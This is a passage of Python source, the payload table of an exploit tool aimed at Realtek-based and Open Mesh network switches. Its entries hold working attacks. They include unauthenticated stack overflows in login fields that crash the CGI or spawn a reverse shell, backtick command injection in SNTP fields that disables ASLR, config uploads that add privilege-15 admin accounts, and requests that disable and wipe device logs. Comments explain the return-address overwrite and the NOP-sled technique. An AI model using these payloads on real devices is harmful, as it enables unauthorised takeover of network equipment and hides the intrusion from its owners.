credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':False,\t\t\t\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&_del=0',\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&_del=1',\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&STARTUP_BACKUP=1',\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Realtek': {\r\n\t\t\t\t'vendor': 'Realtek',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=5121',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_5132=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_5132=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=139&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'&login=1&_CMD_',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':False,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'OpenMESH': { \r\n\t\t\t\t'vendor': 'Open Mesh, Inc.',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'/loginMsg.js',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'',\r\n\t\t\t\t\t\t'disable_query':'',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'',\r\n\t\t\t\t\t\t'clean_logfile_query':'',\r\n\t\t\t\t\t\t'clean_logmem_uri':'',\r\n\t\t\t\t\t\t'clean_logmem_query':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'security.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(280),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'datajson.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(288),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t\t'content':'',\r\n\t\t\t\t\t\t'add_uri':'',\r\n\t\t\t\t\t\t'del_query':'',\r\n\t\t\t\t\t\t'del_uri':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\t# <================================\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntpStatus=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',\r\n\t\t\t\t\t\t'delete_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntpStatus=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True, # It is vulnerable, but I am not using this authenticated code here :>\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Bonus: Disable and clean logs\r\n\t\t\t\t\t#\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: del priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&en=0',\t\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&ta=0',\t\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&ta=1',\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sn=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sn=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Used for both 'heap' and 'stack'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" 